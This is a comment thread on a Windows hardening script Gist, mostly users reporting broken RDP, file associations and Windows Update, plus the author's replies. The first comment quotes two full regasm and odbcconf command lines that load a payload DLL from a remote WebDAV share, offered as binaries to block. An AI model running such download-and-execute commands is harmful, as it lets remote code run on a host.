A Windows hardening script

i would add regasm.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \webdavserver\folder\payload.dll

please also add Odbcconf to the firewall config
odbcconf /s /a {regsvr \webdavserver\folder\payload_dll.txt}

and all the others suggested in the following link
source https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Download%20and%20Execute.md

Sorry for the noob question,but how to run this sript on a windows server.
If you could provide the steps.

Author

Put the content of this Gist on a windows_harden.cmd and run it.

After I've executed the script, impossible to access VM through rdp. It's normal ? What I should modify to allow rdp connection please ?

How can I roll back to the original state?

The script makes it impossible to right click on the Start button and choose any of the Computer management options. I have made a change in my own github, the msc extension should NOT be associated with notepad! Plus, the associations here are all wrong. Instead of just opening a js file with notepad, it's trying to open filename.js.txt, and always errors out, for any of these file types.

The script makes it impossible to right click on the Start button and choose any of the Computer management options. I have made a change in my own github, the msc extension should NOT be associated with notepad! Plus, the associations here are all wrong. Instead of just opening a js file with notepad, it's trying to open filename.js.txt, and always errors out, for any of these file types.

Nice fix, should be merged

Also, one of those damn settings is breaking windows update:
:: Prioritize ECC Curves with longer keys - IISCrypto (recommended options)
reg add "HKLM\SOFTWARE\Policies\Microsoft\Cryptography\Configuration\SSL\00010002" /v EccCurves /t REG_MULTI_SZ /d NistP384,NistP256 /f

And I found another couple of settings that blocks RDP outgoing/incoming. Guys, this script has never been tested in production. Just use my revision which has all of this fixed and contains many improvements.

Author

Hi @atlantsecurity

I'm sorry but did you actually think that this script is some kind of software that you bough and want a refund because it is not working like you want? This script by no means intends or pretends to be something anywhere near of what you might be assuming or thinking.

I'm actually running this on my windows box and other family members for years now, and most of the hardening tweaks from this script are being used in companies in production.

This script was made from another script which, I've given full credit right at its start, and then extended it further based on my own NEEDS not yours or anyone else on the Internet - I decided to store it here for my own benefit and anyone else that might find it useful.

If you don't know what you are doing and don't understand what the script does, then its entirely your own problem and not mine to solve in any way.

So be so kind and go ADD ON YOUR OWN GIST, crappy and unproductive comments as

"Guys, this script has never been tested in production. Just use my revision which has all of this fixed and contains many improvements."

like you somewhat are the author maintaining this script.

Thank you

After running this script i am unable to login with old password

Ok... This script will UTTERLY f*ck your windows server up... You can't open gpedit.msc, you can't RDP into it, you can basically throw that windows server installation down the trash.

Ricardo, I don't care if you sell your script or not. If you post it saying it will harden your workstation when in fact you should state that it will SCREW UP your server, you're just incompetent. That windows 2016 server is throwing up SO MANY ERRORS that it's not even funny.

That's not hardening by any means, that's stripping it down until it can't function. What a waste of perfectly good time...

Ok... This script will UTTERLY f*ck your windows server up... You can't open gpedit.msc, you can't RDP into it, you can basically throw that windows server installation down the trash.

Ricardo, I don't care if you sell your script or not. If you post it saying it will harden your workstation when in fact you should state that it will SCREW UP your server, you're just incompetent. That windows 2016 server is throwing up SO MANY ERRORS that it's not even funny.

That's not hardening by any means, that's stripping it down until it can't function. What a waste of perfectly good time...

Unfortunately I had the same experience.
Can someone share other hardening examples you recommend?

cheers

Ok... This script will UTTERLY f*ck your windows server up... You can't open gpedit.msc, you can't RDP into it, you can basically throw that windows server installation down the trash.

Ricardo, I don't care if you sell your script or not. If you post it saying it will harden your workstation when in fact you should state that it will SCREW UP your server, you're just incompetent. That windows 2016 server is throwing up SO MANY ERRORS that it's not even funny.

That's not hardening by any means, that's stripping it down until it can't function. What a waste of perfectly good time...

@Nephaleem
You can't clearly harden a Windows server with a script that's meant for a Windows client. Hardening a server with a one size fits all script is impossible anyhow. The incompetency here clearly lies not on Ricardo's site...

@ricardojba well done on the script. The implementations and additions that we're made.

Testing this out on a Windows 10 20H2 machine. This makes my life easier. Next step test with other Windows 10 clients and live users. Thumbs Up

after running this script i am unable to take the remote desktop of windows server 2016 any solution?

after running this script i am unable to take the remote desktop of windows server 2016 any solution?

Have you read line 13?

:This script is intended for and tested on Windows 10, so do not run it in a production Windows Server!!!

Thanks for your reply I got it

Do you have any script for windows server 2016 completed hardening script?

Thank you for the script! I’ve changed a few things to tweak it to how I like but I appreciate the upload! To those installing on a prod server or prod workstation without testing and knowing what it does wtf were you thinking? Anyone actually smart in IT would test first then roll to production….

Thank you for the script! it can be used on windows server also?

@azmiameerdeen "yes"

But this is more like a list of things you can do. Make sure you understand what it does. E.g. if your organization uses OneNote, uninstalling the Modern UI version is maybe contra-productive. More examples in there for sure.

I don't recommend this script to windows. if someone has ran this script try restore my default association I copy from window 10 regedit

go download file from my repository https://github.com/ManUnit/windows-default-assosiation.git

How does uninstalling OneDrive harden Windows exactly? it's one of the core built in functionalities that's very useful and can help in recovery process in case of ransomware using its file history feature.